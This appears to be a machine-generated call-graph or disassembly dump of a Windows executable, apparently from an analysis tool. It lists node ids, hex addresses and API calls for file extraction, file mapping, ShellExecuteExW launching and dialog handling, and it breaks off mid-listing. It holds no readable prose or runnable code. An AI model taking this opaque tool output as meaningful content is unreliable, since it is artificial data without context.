23905->23913 23906->23914 23908 cdc1b0 24121 cc12d3 GetDlgItem EnableWindow 23908->24121 23915 cce617 53 API calls 23909->23915 23935 cdbeed 23909->23935 23910->23905 23920 cc4092 _swprintf 51 API calls 23911->23920 23924 cdbcfb 23912->23924 23925 cdbb39 GetModuleFileNameW 23912->23925 23926 cdbcf1 23912->23926 23921 cdb862 23913->23921 23914->23884 23923 cdc169 23914->23923 23934 cce617 53 API calls 23914->23934 23922 cdbed0 23915->23922 23916 cdbd56 24021 cc12f1 GetDlgItem ShowWindow 23916->24021 23917 cdc066 23917->23896 23933 cdbac7 23920->23933 23921->23867 23921->23901 23928 cc4092 _swprintf 51 API calls 23922->23928 24119 cd9ed5 32 API calls 23923->24119 23931 cce617 53 API calls 23924->23931 24112 ccf28c 82 API calls 23925->24112 23926->23833 23926->23924 23927 cdbd66 24022 cc12f1 GetDlgItem ShowWindow 23927->24022 23928->23935 23938 cdbd05 23931->23938 24006 cc966e 23933->24006 23934->23914 23935->23895 23936 cdc188 23936->23884 23937 cdbb5f 23942 cc4092 _swprintf 51 API calls 23937->23942 23943 cc4092 _swprintf 51 API calls 23938->23943 23940 cdc0a0 23939->23940 23940->23903 23944 cdc0a9 DialogBoxParamW 23940->23944 23941 cdbd70 23945 cce617 53 API calls 23941->23945 23947 cdbb81 CreateFileMappingW 23942->23947 23948 cdbd23 23943->23948 23944->23833 23944->23903 23949 cdbd7a SetDlgItemTextW 23945->23949 23951 cdbbe3 GetCommandLineW 23947->23951 23981 cdbc60 __InternalCxxFrameHandler 23947->23981 23960 cce617 53 API calls 23948->23960 24023 cc12f1 GetDlgItem ShowWindow 23949->24023 23950 cdbaed 23954 cdbaf4 GetLastError 23950->23954 23955 cdbaff 23950->23955 23956 cdbbf4 23951->23956 23952 cdbc6b ShellExecuteExW 23979 cdbc88 23952->23979 23954->23955 24014 cc959a 23955->24014 24113 cdb425 SHGetMalloc 23956->24113 23957 cdbd8c SetDlgItemTextW GetDlgItem 23962 cdbda9 GetWindowLongW SetWindowLongW 23957->23962 23963 cdbdc1 23957->23963 23961 cdbd3d 23960->23961 23962->23963 24024 cdc73f 23963->24024 23964->23912 23964->23916 23965 cdbc10 24114 cdb425 SHGetMalloc 23965->24114 23968 cdbc1c 24115 cdb425 SHGetMalloc 23968->24115 23971 cdbccb 23971->23926 23977 cdbce1 UnmapViewOfFile CloseHandle 23971->23977 23972 cdc73f 97 API calls 23974 cdbddd 23972->23974 23973 cdbc28 24116 ccf3fa 82 API calls 2 library calls 23973->24116 24049 cdda52 23974->24049 23977->23926 23978 cdbc3f MapViewOfFile 23978->23981 23979->23971 23982 cdbcb7 Sleep 23979->23982 23981->23952 23982->23971 23982->23979 23983 cdc73f 97 API calls 23986 cdbe03 23983->23986 23984 cdbe2c 24117 cc12d3 GetDlgItem EnableWindow 23984->24117 23986->23984 23988 cdc73f 97 API calls 23986->23988 23987->23833 23987->23857 23988->23984 23990 cc131f 23989->23990 23991 cc1378 23989->23991 23993 cc1385 23990->23993 24122 cce2e8 62 API calls 2 library calls 23990->24122 24123 cce2c1 GetWindowLongW SetWindowLongW 23991->24123 23993->23825 23993->23826 23993->23901 23995 cc1341 23995->23993 23996 cc1354 GetDlgItem 23995->23996 23996->23993 23997 cc1364 23996->23997 23997->23993 23998 cc136a SetWindowTextW 23997->23998 23998->23993 24002 cca0bb 23999->24002 24000 cca14c 24001 cca2b2 8 API calls 24000->24001 24003 cca175 24000->24003 24001->24003 24002->24000 24002->24003 24124 cca2b2 24002->24124 24003->23887 24003->23888 24005->23894 24007 cc9678 24006->24007 24008 cc96d5 CreateFileW 24007->24008 24009 cc96c9 24007->24009 24008->24009 24010 cc971f 24009->24010 24011 ccbb03 GetCurrentDirectoryW 24009->24011 24010->23950 24012 cc9704 24011->24012 24012->24010 24013 cc9708 CreateFileW 24012->24013 24013->24010 24015 cc95be 24014->24015 24020 cc95cf 24014->24020 24016 cc95ca 24015->24016 24017 cc95d1 24015->24017 24015->24020 24145 cc974e 24016->24145 24150 cc9620 24017->24150 24020->23964 24021->23927 24022->23941 24023->23957 24025 cdc749 __EH_prolog 24024->24025 24026 cdbdcf 24025->24026 24027 cdb314 ExpandEnvironmentStringsW 24025->24027 24026->23972 24028 cdc780 _wcslen _wcsrchr 24027->24028 24028->24026 24030 cdb314 ExpandEnvironmentStringsW 24028->24030 24031 cdca67 SetWindowTextW 24028->24031 24034 ce3e3e 22 API calls 24028->24034 24036 cdc855 SetFileAttributesW 24028->24036 24041 cdcc31 GetDlgItem SetWindowTextW SendMessageW 24028->24041 24044 cdcc71 SendMessageW 24028->24044 24165 cd1fbb CompareStringW 24028->24165 24166 cda64d GetCurrentDirectoryW 24028->24166 24168 cca5d1 6 API calls 24028->24168 24169 cca55a FindClose 24028->24169 24170 cdb48e 76 API calls 2 library calls 24028->24170 24030->24028 24031->24028 24034->24028 24038 cdc90f GetFileAttributesW 24036->24038 24048 cdc86f __cftof _wcslen 24036->24048 24038->24028 24040 cdc921 DeleteFileW 24038->24040 24040->24028 24042 cdc932 24040->24042 24041->24028 24043 cc4092 _swprintf 51 API calls 24042->24043 24045 cdc952 GetFileAttributesW 24043->24045 24044->24028 24045->24042 24046 cdc967 MoveFileW 24045->24046 24046->24028 24047 cdc97f MoveFileExW 24046->24047 24047->24028 24048->24028 24048->24038 24167 ccb991 51 API calls 2 library calls 24048->24167 24050 cdda5c __EH_prolog 24049->24050 24171 cd0659 24050->24171 24052 cdda8d 24175 cc5b3d 24052->24175 24054 cddaab 24179 cc7b0d 24054->24179 24058 cddafe 24195 cc7b9e 24058->24195 24060 cdbdee 24060->23983 24062 cdd6a8 24061->24062 24711 cda5c6 24062->24711 24065 cdd6b5 GetWindow 24066 cdbf15 24065->24066 24072 cdd6d5 24065->24072 24066->23834 24066->23835 24067 cdd6e2 GetClassNameW 24716 cd1fbb CompareStringW 24067->24716 24069 cdd76a GetWindow 24069->24066 24069->24072 24070 cdd706 GetWindowLongW 24070->24069 24071 cdd716 SendMessageW 24070->24071 24071->24069 24073 cdd72c GetObjectW 24071->24073 24072->24066 24072->24067 24072->24069 24072->24070 24717 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24073->24717 24075 cdd743 24718 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24075->24718 24719 cda80c 8 API calls 24075->24719 24078 cdd754 SendMessageW DeleteObject 24078->24069 24079->23849 24081 cdabcc 24080->24081 24082 cdabf1 24080->24082 24722 cd1fbb CompareStringW 24081->24722 24084 cdabff 24082->24084 24085 cdabf6 SHAutoComplete 24082->24085 24088 cdb093 24084->24088 24085->24084 24086 cdabdf 24086->24082 24087 cdabe3 FindWindowExW 24086->24087 24087->24082 24089 cdb09d __EH_prolog 24088->24089 24090 cc13dc 84 API calls 24089->24090 24091 cdb0bf 24090->24091 24723 cc1fdc 24091->24723 24094 cdb0d9 24096 cc1692 86 API calls 24094->24096 24095 cdb0eb 24097 cc19af 128 API calls 24095->24097 24098 cdb0e4 24096->24098 24100 cdb10d __InternalCxxFrameHandler ___std_exception_copy 24097->24100 24098->23874 24098->23876 24099 cc1692 86 API calls 24099->24098 24100->24099 24101->23921 24103 cdb568 5 API calls 24102->24103 24104 cdd4e0 GetDlgItem 24103->24104 24105 cdd536 SendMessageW SendMessageW 24104->24105 24106 cdd502 24104->24106 24107 cdd591 SendMessageW SendMessageW SendMessageW 24105->24107 24108 cdd572 24105->24108 24109 cdd50d ShowWindow SendMessageW SendMessageW 24106->24109 24110 cdd5c4 SendMessageW 24107->24110 24111 cdd5e7 SendMessageW 24107->24111 24108->24107 24109->24105 24110->24111 24111->23877 24112->23937 24113->23965 24114->23968 24115->23973 24116->23978 24117->23987 24118->23917 24119->23936 24120->23908 24121->23897 24122->23995 24123->23993 24125 cca2bf 24124->24125 24126 cca2e3 24125->24126 24127 cca2d6 CreateDirectoryW 24125->24127 24128 cca231 3 API calls 24126->24128 24127->24126 24129 cca316 24127->24129 24130 cca2e9 24128->24130 24132 cca325 24129->24132 24137 cca4ed 24129->24137 24131 cca329 GetLastError 24130->24131 24133 ccbb03 GetCurrentDirectoryW 24130->24133 24131->24132 24132->24002 24135 cca2ff 24133->24135 24135->24131 24136 cca303 CreateDirectoryW 24135->24136 24136->24129 24136->24131 24138 cdec50 24137->24138 24139 cca4fa SetFileAttributesW 24138->24139 24140 cca53d 24139->24140 24141 cca510 24139->24141 24140->24132 24142 ccbb03 GetCurrentDirectoryW 24141->24142 24143 cca524 24142->24143 24143->24140 24144 cca528 SetFileAttributesW 24143->24144 24144->24140 24146 cc9781 24145->24146 24147 cc9757 24145->24147 24146->24020 24147->24146 24156 cca1e0 24147->24156 24152 cc964a 24150->24152 24153 cc962c 24150->24153 24151 cc9669 24151->24020 24152->24151 24164 cc6bd5 76 API calls 24152->24164 24153->24152 24154 cc9638 FindCloseChangeNotification 24153->24154 24154->24152 24157 cdec50 24156->24157 24158 cca1ed DeleteFileW 24157->24158 24159 cc977f 24158->24159 24160 cca200 24158->24160 24159->24020 24161 ccbb03 GetCurrentDirectoryW 24160->24161 24162 cca214 24161->24162 24162->24159 24163 cca218 DeleteFileW 24162->24163 24163->24159 24164->24151 24165->24028 24166->24028 24167->24048 24168->24028 24169->24028 24170->24028 24172 cd0666 _wcslen 24171->24172 24199 cc17e9 24172->24199 24174 cd067e 24174->24052 24176 cd0659 _wcslen 24175->24176 24177 cc17e9 78 API calls 24176->24177 24178 cd067e 24177->24178 24178->24054 24180 cc7b17 __EH_prolog 24179->24180 24216 ccce40 24180->24216 24182 cc7b32 24222 cdeb38 24182->24222 24184 cc7b5c 24231 cd4a76 24184->24231 24187 cc7c7d 24188 cc7c87 24187->24188 24190 cc7cf1 24188->24190 24263 cca56d 24188->24263 24193 cc7d50 24190->24193 24241 cc8284 24190->24241 24191 cc7d92 24191->24058 24193->24191 24269 cc138b 74 API calls 24193->24269 24196 cc7bac 24195->24196 24198 cc7bb3 24195->24198 24197 cd2297 86 API calls 24196->24197 24197->24198 24200 cc17ff 24199->24200 24211 cc185a __InternalCxxFrameHandler 24199->24211 24201 cc1828 24200->24201 24212 cc6c36 76 API calls __vswprintf_c_l 24200->24212 24202 cc1887 24201->24202 24208 cc1847 ___std_exception_copy 24201->24208 24205 ce3e3e 22 API calls 24202->24205 24204 cc181e 24213 cc6ca7 75 API calls 24204->24213 24206 cc188e 24205->24206 24206->24211 24215 cc6ca7 75 API calls 24206->24215 24208->24211 24214 cc6ca7 75 API calls 24208->24214 24211->24174 24212->24204 24213->24201 24214->24211 24215->24211 24217 ccce4a __EH_prolog 24216->24217 24218 cdeb38 8 API calls 24217->24218 24219 ccce8d 24218->24219 24220 cdeb38 8 API calls 24219->24220 24221 ccceb1 24220->24221 24221->24182 24223 cdeb3d ___std_exception_copy 24222->24223 24224 cdeb57 24223->24224 24227 cdeb59 24223->24227 24237 ce7a5e 7 API calls 2 library calls 24223->24237 24224->24184 24226 cdf5c9 24239 ce238d RaiseException 24226->24239 24227->24226 24238 ce238d RaiseException 24227->24238 24229 cdf5e6 24232 cd4a80 __EH_prolog 24231->24232 24233 cdeb38 8 API calls 24232->24233 24234 cd4a9c 24233->24234 24235 cc7b8b 24234->24235 24240 cd0e46 80 API calls 24234->24240 24235->24187 24237->24223 24238->24226 24239->24229 24240->24235 24242 cc828e __EH_prolog 24241->24242 24270 cc13dc 24242->24270 24244 cc82aa 24245 cc82bb 24244->24245 24413 cc9f42 24244->24413 24250 cc82f2 24245->24250 24278 cc1a04 24245->24278 24409 cc1692 24250->24409 24251 cc8389 24297 cc8430 24251->24297 24255 cc83e8 24305 cc1f6d 24255->24305 24258 cc83f3 24258->24250 24309 cc3b2d 24258->24309 24321 cc848e 24258->24321 24260 cca56d 7 API calls 24261 cc82ee 24260->24261 24261->24250 24261->24251 24261->24260 24417 ccc0c5 CompareStringW _wcslen 24261->24417 24264 cca582 24263->24264 24268 cca5b0 24264->24268 24700 cca69b 24264->24700 24266 cca592 24267 cca597 FindClose 24266->24267 24266->24268 24267->24268 24268->24188 24269->24191 24271 cc13e1 __EH_prolog 24270->24271 24272 ccce40 8 API calls 24271->24272 24273 cc1419 24272->24273 24274 cdeb38 8 API calls 24273->24274 24277 cc1474 __cftof 24273->24277 24275 cc1461 24274->24275 24276 ccb505 84 API calls 24275->24276 24275->24277 24276->24277 24277->24244 24279 cc1a0e __EH_prolog 24278->24279 24291 cc1a61 24279->24291 24294 cc1b9b 24279->24294 24418 cc13ba 24279->24418 24281 cc1bc7 24430 cc138b 74 API calls 24281->24430 24284 cc3b2d 101 API calls 24288 cc1c12 24284->24288 24285 cc1bd4 24285->24284 24285->24294 24286 cc1c5a 24290 cc1c8d 24286->24290 24286->24294 24431 cc138b 74 API calls 24286->24431 24288->24286 24289 cc3b2d 101 API calls 24288->24289 24289->24288 24290->24294 24295 cc9e80 79 API calls 24290->24295 24291->24281 24291->24285 24291->24294 24292 cc3b2d 101 API calls 24293 cc1cde 24292->24293 24293->24292 24293->24294 24294->24261 24295->24293 24451 cccf3d 24297->24451 24299 cc8440 24455 cd13d2 GetSystemTime SystemTimeToFileTime 24299->24455 24301 cc83a3 24301->24255 24302 cd1b66 24301->24302 24462 cdde6b 24302->24462 24306 cc1f72 __EH_prolog 24305->24306 24308 cc1fa6 24306->24308 24470 cc19af 24306->24470 24308->24258 24310 cc3b3d 24309->24310 24311 cc3b39 24309->24311 24320 cc9e80 79 API calls 24310->24320 24311->24258 24312 cc3b4f 24313 cc3b78 24312->24313 24314 cc3b6a 24312->24314 24624 cc286b 101 API calls 3 library calls 24313->24624 24316 cc3baa 24314->24316 24623 cc32f7 89 API calls 2 library calls 24314->24623 24316->24258 24318 cc3b76 24318->24316 24625 cc20d7 74 API calls 24318->24625 24320->24312 24322 cc8498 __EH_prolog 24321->24322 24325 cc84d5 24322->24325 24332 cc8513 24322->24332 24650 cd8c8d 103 API calls 24322->24650 24324 cc84f5 24326 cc851c 24324->24326 24327 cc84fa 24324->24327 24325->24324 24330 cc857a 24325->24330 24325->24332 24326->24332 24652 cd8c8d 103 API calls 24326->24652 24327->24332 24651 cc7a0d 152 API calls 24327->24651 24330->24332 24626 cc5d1a 24330->24626 24332->24258 24333 cc8605 24333->24332 24632 cc8167 24333->24632 24336 cc8797 24337 cca56d 7 API calls 24336->24337 24338 cc8802 24336->24338 24337->24338 24638 cc7c0d 24338->24638 24340 ccd051 82 API calls 24346 cc885d 24340->24346 24341 cc898b 24655 cc2021 74 API calls 24341->24655 24342 cc8992 24343 cc8a5f 24342->24343 24349 cc89e1 24342->24349 24347 cc8ab6 24343->24347 24361 cc8a6a 24343->24361 24346->24332 24346->24340 24346->24341 24346->24342 24653 cc8117 84 API calls 24346->24653 24654 cc2021 74 API calls 24346->24654 24353 cc8a4c 24347->24353 24658 cc7fc0 97 API calls 24347->24658 24348 cc8ab4 24354 cc959a 80 API calls 24348->24354 24351 cc8b14 24349->24351 24349->24353 24355 cca231 3 API calls 24349->24355 24350 cc9105 24352 cc959a 80 API calls 24350->24352 24351->24350 24369 cc8b82 24351->24369 24659 cc98bc 24351->24659 24352->24332 24353->24348 24353->24351 24354->24332 24357 cc8a19 24355->24357 24357->24353 24656 cc92a3 97 API calls 24357->24656 24358 ccab1a 8 API calls 24362 cc8bd1 24358->24362 24361->24348 24657 cc7db2 101 API calls 24361->24657 24364 ccab1a 8 API calls 24362->24364 24379 cc8be7 24364->24379 24367 cc8b70 24663 cc6e98 77 API calls 24367->24663 24369->24358 24370 cc8cbc 24371 cc8d18 24370->24371 24372 cc8e40 24370->24372 24373 cc8d8a 24371->24373 24376 cc8d28 24371->24376 24374 cc8e66 24372->24374 24375 cc8e52 24372->24375 24395 cc8d49 24372->24395 24383 cc8167 19 API calls 24373->24383 24378 cd3377 75 API calls 24374->24378 24377 cc9215 123 API calls 24375->24377 24380 cc8d6e 24376->24380 24385 cc8d37 24376->24385 24377->24395 24381 cc8e7f 24378->24381 24379->24370 24382 cc8c93 24379->24382 24390 cc981a 79 API calls 24379->24390 24380->24395 24666 cc77b8 111 API calls 24380->24666 24387 cd3020 123 API calls 24381->24387 24382->24370 24664 cc9a3c 82 API calls 24382->24664 24384 cc8dbd 24383->24384 24391 cc8df5 24384->24391 24392 cc8de6 24384->24392 24384->24395 24665 cc2021 74 API calls 24385->24665 24387->24395 24390->24382 24668 cc9155 93 API calls __EH_prolog 24391->24668 24667 cc7542 85 API calls 24392->24667 24399 cc8f85 24395->24399 24669 cc2021 74 API calls 24395->24669 24397 cca4ed 3 API calls 24401 cc90eb 24397->24401 24398 cc903e 24645 cc9da2 24398->24645 24399->24350 24399->24398 24406 cc9090 24399->24406 24644 cc9f09 SetEndOfFile 24399->24644 24401->24350 24670 cc2021 74 API calls 24401->24670 24403 cc9085 24404 cc9620 77 API calls 24403->24404 24404->24406 24406->24350 24406->24397 24407 cc90fb 24671 cc6dcb 76 API calls 24407->24671 24410 cc16a4 24409->24410 24687 cccee1 24410->24687 24414 cc9f59 24413->24414 24415 cc9f63 24414->24415 24699 cc6d0c 78 API calls 24414->24699 24415->24245 24417->24261 24432 cc1732 24418->24432 24420 cc13d6 24421 cc9e80 24420->24421 24422 cc9e92 24421->24422 24426 cc9ea5 24421->24426 24423 cc9eb0 24422->24423 24449 cc6d5b 77 API calls 24422->24449 24423->24291 24425 cc9eb8 SetFilePointer 24425->24423 24427 cc9ed4 GetLastError 24425->24427 24426->24423 24426->24425 24427->24423 24428 cc9ede 24427->24428 24428->24423 24450 cc6d5b 77 API calls 24428->24450 24430->24294 24431->24290 24433 cc1748 24432->24433 24443 cc17a0 __InternalCxxFrameHandler 24432->24443 24434 cc1771 24433->24434 24445 cc6c36 76 API calls __vswprintf_c_l 24433->24445 24436 cc17c7 24434->24436 24441 cc178d ___std_exception_copy 24434->24441 24438 ce3e3e 22 API calls 24436->24438 24437 cc1767 24446 cc6ca7 75 API calls 24437->24446 24440 cc17ce 24438->24440 24440->24443 24448 cc6ca7 75 API calls 24440->24448 24441->24443 24447 cc6ca7 75 API calls 24441->24447 24443->24420 24445->24437 24446->24434 24447->24443 24448->24443 24449->24426 24450->24423 24452 cccf4d 24451->24452 24454 cccf54 24451->24454 24456 cc981a 24452->24456 24454->24299 24455->24301 24457 cc9833 24456->24457 24460 cc9e80 79 API calls 24457->24460 24458 cc9837 24461 cc9e80 79 API calls 24458->24461 24459 cc9865 24459->24454 24460->24458 24461->24459 24463 cdde78 24462->24463 24464 cce617 53 API calls 24463->24464 24465 cdde9b 24464->24465 24466 cc4092 _swprintf 51 API calls 24465->24466 24467 cddead 24466->24467 24468 cdd4d4 16 API calls 24467->24468 24469 cd1b7c 24468->24469 24469->24255 24471 cc19bf 24470->24471 24473 cc19bb 24470->24473 24474 cc18f6 24471->24474 24473->24308 24475 cc1908 24474->24475 24476 cc1945 24474->24476 24477 cc3b2d 101 API calls 24475->24477 24482 cc3fa3 24476->24482 24480 cc1928 24477->24480 24480->24473 24483 cc3fac 24482->24483 24484 cc3b2d 101 API calls 24483->24484 24485 cc1966 24483->24485 24499 cd0e08 24483->24499 24484->24483 24485->24480 24487 cc1e50 24485->24487 24488 cc1e5a __EH_prolog 24487->24488 24507 cc3bba 24488->24507 24490 cc1e84 24491 cc1732 78 API calls 24490->24491 24494 cc1f0b 24490->24494 24492 cc1e9b 24491->24492 24535 cc18a9 78 API calls 24492->24535 24494->24480 24495 cc1eb3 24497 cc1ebf _wcslen 24495->24497 24536 cd1b84 MultiByteToWideChar 24495->24536 24537 cc18a9 78 API calls 24497->24537 24500 cd0e0f 24499->24500 24501 cd0e2a 24500->24501 24505 cc6c31 RaiseException CallUnexpected 24500->24505 24503 cd0e3b SetThreadExecutionState 24501->24503 24506 cc6c31 RaiseException CallUnexpected 24501->24506 24503->24483 24505->24501 24506->24503 24508 cc3bc4 __EH_prolog 24507->24508 24509 cc3bda 24508->24509 24510 cc3bf6 24508->24510 24563 cc138b 74 API calls 24509->24563 24512 cc3e51 24510->24512 24515 cc3c22 24510->24515 24588 cc138b 74 API calls 24512->24588 24514 cc3be5 24514->24490 24515->24514 24538 cd3377 24515->24538 24517 cc3ca3 24518 cc3d2e 24517->24518 24534 cc3c9a 24517->24534 24566 ccd051 24517->24566 24548 ccab1a 24518->24548 24519 cc3c9f 24519->24517 24565 cc20bd 78 API calls 24519->24565 24521 cc3c8f 24564 cc138b 74 API calls 24521->24564 24522 cc3c71 24522->24517 24522->24519 24522->24521 24526 cc3d41 24528 cc3dd7 24526->24528 24529 cc3dc7 24526->24529 24572 cd3020 24528->24572 24552 cc9215 24529->24552 24532 cc3dd5 24532->24534 24581 cc2021 74 API calls 24532->24581 24582 cd2297 24534->24582 24535->24495 24536->24497 24537->24494 24539 cd338c 24538->24539 24541 cd3396 ___std_exception_copy 24538->24541 24589 cc6ca7 75 API calls 24539->24589 24542 cd34c6 24541->24542 24543 cd341c 24541->24543 24547 cd3440 __cftof 24541->24547 24591 ce238d RaiseException 24542->24591 24590 cd32aa 75 API calls 3 library calls 24543->24590 24546 cd34f2 24547->24522 24549 ccab28 24548->24549 24551 ccab32 24548->24551 24550 cdeb38 8 API calls 24549->24550 24550->24551 24551->24526 24553 cc921f __EH_prolog 24552->24553 24592 cc7c64 24553->24592 24556 cc13ba 78 API calls 24557 cc9231 24556->24557 24595 ccd114 24557->24595 24559 cc928a 24559->24532 24560 cc9243 24560->24559 24562 ccd114 118 API calls 24560->24562 24604 ccd300 97 API calls __InternalCxxFrameHandler 24560->24604 24562->24560 24563->24514 24564->24534 24565->24517 24567 ccd084 24566->24567 24568 ccd072 24566->24568 24606 cc603a 82 API calls 24567->24606 24605 cc603a 82 API calls 24568->24605 24571 ccd07c 24571->24518 24573 cd3052 24572->24573 24575 cd3029 24572->24575 24580 cd3046 24573->24580 24621 cd552f 123 API calls 2 library calls 24573->24621 24574 cd3048 24620 cd624a 118 API calls 24574->24620 24575->24574 24577 cd303e 24575->24577 24575->24580 24607 cd6cdc 24577->24607 24580->24532 24581->24534 24583 cd22a1 24582->24583 24584 cd22ba 24583->24584 24587 cd22ce 24583->24587 24622 cd0eed 86 API calls 24584->24622 24586 cd22c1 24586->24587 24588->24514 24589->24541 24590->24547 24591->24546 24593 ccb146 GetVersionExW 24592->24593 24594 cc7c69 24593->24594 24594->24556 24600 ccd12a __InternalCxxFrameHandler 24595->24600 24596 ccd29a 24597 ccd2ce 24596->24597 24598 ccd0cb 6 API calls 24596->24598 24599 cd0e08 SetThreadExecutionState RaiseException 24597->24599 24598->24597 24602 ccd291 24599->24602 24600->24596 24601 cd8c8d 103 API calls 24600->24601 24600->24602 24603 ccac05 91 API calls 24600->24603 24601->24600 24602->24560 24603->24600 24604->24560 24605->24571 24606->24571 24608 cd359e 75 API calls 24607->24608 24609 cd6ced __InternalCxxFrameHandler 24608->24609 24610 ccd114 118 API calls 24609->24610 24611 cd70fe 24609->24611 24614 cd11cf 81 API calls 24609->24614 24615 cd3e0b 118 API calls 24609->24615 24616 cd7153 118 API calls 24609->24616 24617 cd0f86 88 API calls 24609->24617 24618 cd77ef 123 API calls 24609->24618 24619 cd390d 98 API calls 24609->24619 24610->24609 24612 cd5202 98 API calls 24611->24612 24613 cd710e __InternalCxxFrameHandler 24612->24613 24613->24580 24614->24609 24615->24609 24616->24609 24617->24609 24618->24609 24619->24609 24620->24580 24621->24580 24622->24586 24623->24318 24624->24318 24625->24316 24627 cc5d2a 24626->24627 24672 cc5c4b 24627->24672 24630 cc5d5d 24631 cc5d95 24630->24631 24677 ccb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24630->24677 24631->24333 24633 cc8186 24632->24633 24634 cc8232 24633->24634 24684 ccbe5e 19 API calls __InternalCxxFrameHandler 24633->24684 24683 cd1fac CharUpperW 24634->24683 24637 cc823b 24637->24336 24639 cc7c22 24638->24639 24640 cc7c5a 24639->24640 24685 cc6e7a 74 API calls 24639->24685 24640->24346 24642 cc7c52 24686 cc138b 74 API calls 24642->24686 24644->24398 24646 cc9db3 24645->24646 24648 cc9dc2 24645->24648 24647 cc9db9 FlushFileBuffers 24646->24647 24646->24648 24647->24648 24649 cc9e3f SetFileTime 24648->24649 24649->24403 24650->24325 24651->24332 24652->24332 24653->24346 24654->24346 24655->24342 24656->24353 24657->24348 24658->24353 24660 cc98c5 GetFileType 24659->24660 24661 cc8b5a 24659->24661 24660->24661 24661->24369 24662 cc2021 74 API calls 24661->24662 24662->24367 24663->24369 24664->24370 24665->24395 24666->24395 24667->24395 24668->24395 24669->24399 24670->24407 24671->24350 24678 cc5b48 24672->24678 24675 cc5c6c 24675->24630 24676 cc5b48 2 API calls 24676->24675 24677->24630 24681 cc5b52 24678->24681 24679 cc5c3a 24679->24675 24679->24676 24681->24679 24682 ccb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24681->24682 24682->24681 24683->24637 24684->24634 24685->24642 24686->24640 24688 cccef2 24687->24688 24693 cca99e 24688->24693 24690 cccf24 24691 cca99e 86 API calls 24690->24691 24692 cccf2f 24691->24692 24694 cca9c1 24693->24694 24697 cca9d5 24693->24697 24698 cd0eed 86 API calls 24694->24698 24696 cca9c8 24696->24697 24697->24690 24698->24696 24699->24415 24701 cca6a8 24700->24701 24702 cca727 FindNextFileW 24701->24702 24703 cca6c1 FindFirstFileW 24701->24703 24704 cca732 GetLastError 24702->24704 24710 cca709 24702->24710 24705 cca6d0 24703->24705 24703->24710 24704->24710 24706 ccbb03 GetCurrentDirectoryW 24705->24706 24707 cca6e0 24706->24707 24708 cca6fe GetLastError 24707->24708 24709 cca6e4 FindFirstFileW 24707->24709 24708->24710 24709->24708 24709->24710 24710->24266 24720 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24711->24720 24713 cda5cd 24714 cda5d9 24713->24714 24721 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24713->24721 24714->24065 24714->24066 24716->24072 24717->24075 24718->24075 24719->24078 24720->24713 24721->24714 24722->24086 24724 cc9f42 78 API calls 24723->24724 24725 cc1fe8 24724->24725 24726 cc1a04 101 API calls 24725->24726 24729 cc2005 24725->24729 24727 cc1ff5 24726->24727 24727->24729 24730 cc138b 74 API calls 24727->24730 24729->24094 24729->24095 24730->24729 24731 cc13e1 84 API calls 2 library calls 25409 cd94e0 GetClientRect 25444 cd21e0 26 API calls std::bad_exception::bad_exception 25470 cdf2e0 46 API calls __RTC_Initialize 25471 cebee0 GetCommandLineA GetCommandLineW 25410 ce2cfb 38 API calls 4 library calls 25445 cc95f0 80 API calls 25446 cdfd4f 9 API calls 2 library calls 25472 cc5ef0 82 API calls 24754 ce98f0 24762 ceadaf 24754->24762 24758 ce990c 24759 ce9919 24758->24759 24770 ce9920 11 API calls 24758->24770 24761 ce9904 24771 ceac98 24762->24771 24765 ceadee TlsAlloc 24766 ceaddf 24765->24766 24767 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24766->24767 24768 ce98fa 24767->24768 24768->24761 24769 ce9869 20 API calls 2 library calls 24768->24769 24769->24758 24770->24761 24772 ceacc8 24771->24772 24774 ceacc4 24771->24774 24772->24765 24772->24766 24774->24772 24776 ceace8 24774->24776 24778 cead34 24774->24778 24775 ceacf4 GetProcAddress 24777 cead04 __dosmaperr 24775->24777 24776->24772 24776->24775 24777->24772 24779 cead4a 24778->24779 24780 cead55 LoadLibraryExW 24778->24780 24779->24774 24781 cead72 GetLastError 24780->24781 24783 cead8a 24780->24783 24782 cead7d LoadLibraryExW 24781->24782 24781->24783 24782->24783 24783->24779 24784 ceada1 FreeLibrary 24783->24784 24784->24779 24786 ceabf0 24787 ceabfb 24786->24787 24789 ceac24 24787->24789 24791 ceac20 24787->24791 24792 ceaf0a 24787->24792 24799 ceac50 DeleteCriticalSection 24789->24799 24793 ceac98 __dosmaperr 5 API calls 24792->24793 24794 ceaf31 24793->24794 24795 ceaf4f InitializeCriticalSectionAndSpinCount 24794->24795 24796 ceaf3a 24794->24796 24795->24796 24797 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24796->24797 24798 ceaf66 24797->24798 24798->24787 24799->24791 25412 ce88f0 7 API calls ___scrt_uninitialize_crt 25448 cdb18d 78 API calls 25413 cdc793 97 API calls 4 library calls 25473 cdc793 102 API calls 4 library calls 25451 cd9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25490 cc6faa 111 API calls 3 library calls 25453 cdeda7 48 API calls _unexpected 25416 cddca1 DialogBoxParamW 24818 cdf3a0 24823 cdf9d5 SetUnhandledExceptionFilter 24818->24823 24820 cdf3a5 24824 ce8c3a 26 API calls 2 library calls 24820->24824 24822 cdf3b0 24823->24820 24824->24822 25419 cea4a0 71 API calls _free 25474 cea6a0 31 API calls 2 library calls 25420 cf08a0 IsProcessorFeaturePresent 25491 cd1bbd GetCPInfo IsDBCSLeadByte 25454 ceb1b8 27 API calls 2 library calls 25455 cdb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24960 cdf3b2 24961 cdf3be __FrameHandler3::FrameUnwindToState 24960->24961 24992 cdeed7 24961->24992 24963 cdf3c5 24964 cdf518 24963->24964 24967 cdf3ef 24963->24967 25065 cdf838 4 API calls 2 library calls 24964->25065 24966 cdf51f 25058 ce7f58 24966->25058 24979 cdf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24967->24979 25003 ce8aed 24967->25003 24974 cdf40e 24976 cdf48f 25011 cdf953 GetStartupInfoW __cftof 24976->25011 24978 cdf495 25012 ce8a3e 51 API calls 24978->25012 24979->24976 25061 ce7af4 38 API calls 2 library calls 24979->25061 24981 